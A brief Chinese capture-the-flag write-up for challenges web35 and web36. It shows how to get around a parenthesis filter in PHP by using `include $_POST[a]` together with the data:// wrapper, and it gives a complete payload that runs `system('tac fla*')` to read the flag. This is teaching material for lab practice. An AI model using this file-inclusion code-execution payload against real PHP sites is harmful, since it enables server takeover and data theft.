web35
分析源码
发现对括号进行过滤,那么只能使用不带括号的函数,
include $_POST[a]
进行文件包含,看到能文件包含之后,可以尝试使用data协议命令执行,虽然data协议的命令执行写过很多遍了,但是还是再要提一下
data:text/plain,<?php system("命令");?>
构造
payload: ?c=include%a$_POST[a]?> POST:a=data:text/plain,<?php system('tac fla*');?>`
成功获取flag
web36
web36也是一样的解题方法,直接参考web35,这里不做详解,直接放图